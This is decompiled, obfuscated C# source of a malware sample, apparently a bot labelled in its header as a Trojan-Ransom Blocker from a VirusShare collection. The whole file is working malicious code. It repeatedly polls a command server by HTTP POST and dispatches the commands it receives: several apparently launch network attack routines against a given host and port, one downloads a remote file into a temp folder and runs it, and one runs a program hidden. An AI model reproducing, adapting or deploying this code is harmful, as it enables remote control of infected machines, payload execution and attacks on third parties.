// Decompiled with JetBrains decompiler // Type: A.c9b81b1a3e4ee51d08f5de2448e459036 // Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Net; using System.Text; using System.Threading; namespace A { internal class c9b81b1a3e4ee51d08f5de2448e459036 { private string c749d615fce46a65e549ecd0269efb309 = string.Empty; public void ccca4f7e07f327977d582f4cecb7af4cd() { this.c70c0917b5d671ac9ae9d4e7f861b66d0(); new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start(); } private void c70c0917b5d671ac9ae9d4e7f861b66d0() { string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2; while (true) { try { string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb); if (str.Length > 0) { if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b) break; Environment.Exit(-1); } } catch { } Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000); } } private void ca33aa6acdace65e5414a966dd1dc03ae() { string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f; while (true) { try { string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb); if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0) { if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309) { this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d); this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d; } } else { try { c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870(); } catch { } try { c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383(); } catch { } try { ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62(); } catch { } try { cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15(); } catch { } this.c749d615fce46a65e549ecd0269efb309 = string.Empty; } } catch { } Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000); } } private string c372676659fe6f48f27b1ad11ccb40951( string cf7d7ab02f04f36e1e7781d49924e7769, string c2cbf7d2e1f35e8102d156c340d5f99cb) { ServicePointManager.Expect100Continue = false; HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769); httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478); httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545); httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b; byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb); httpWebRequest.ContentLength = (long) bytes.Length; Stream requestStream = httpWebRequest.GetRequestStream(); requestStream.Write(bytes, 0, bytes.Length); requestStream.Close(); WebResponse response = httpWebRequest.GetResponse(); return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim(); } private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d) { string[] strArray = new string[0]; try { strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*'); } catch { } string key; if ((key = strArray[0]) == null) return; // ISSUE: reference to a compiler-generated field if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null) { // ISSUE: reference to a compiler-generated field c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary(8) { { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554), 0 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571), 1 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590), 2 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607), 3 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626), 4 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643), 5 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654), 6 }, { c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667), 7 } }; } int num; // ISSUE: reference to a compiler-generated field // ISSUE: explicit non-virtual call if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num))) return; switch (num) { case 0: try { c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]); c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]); c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]); c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]); c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47(); break; } catch { break; } case 1: try { c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]); c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]); c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429(); break; } catch { break; } case 2: try { ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]); ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]); ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]); ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]); ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]); ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a(); break; } catch { break; } case 3: try { cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]); cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]); cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]); cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]); cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]); cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90(); break; } catch { break; } case 4: try { string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680); new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str); new Process() { StartInfo = { FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str) } }.Start(); break; } catch { break; } case 5: try { Process process = new Process() { StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1])) }; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.Start(); break; } catch { break; } case 6: c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1])); break; case 7: if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698))) break; c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6(); break; } } } }